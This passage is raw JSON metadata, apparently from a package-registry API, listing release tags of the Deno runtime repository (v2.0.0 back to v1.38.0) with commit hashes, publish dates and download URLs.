itHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1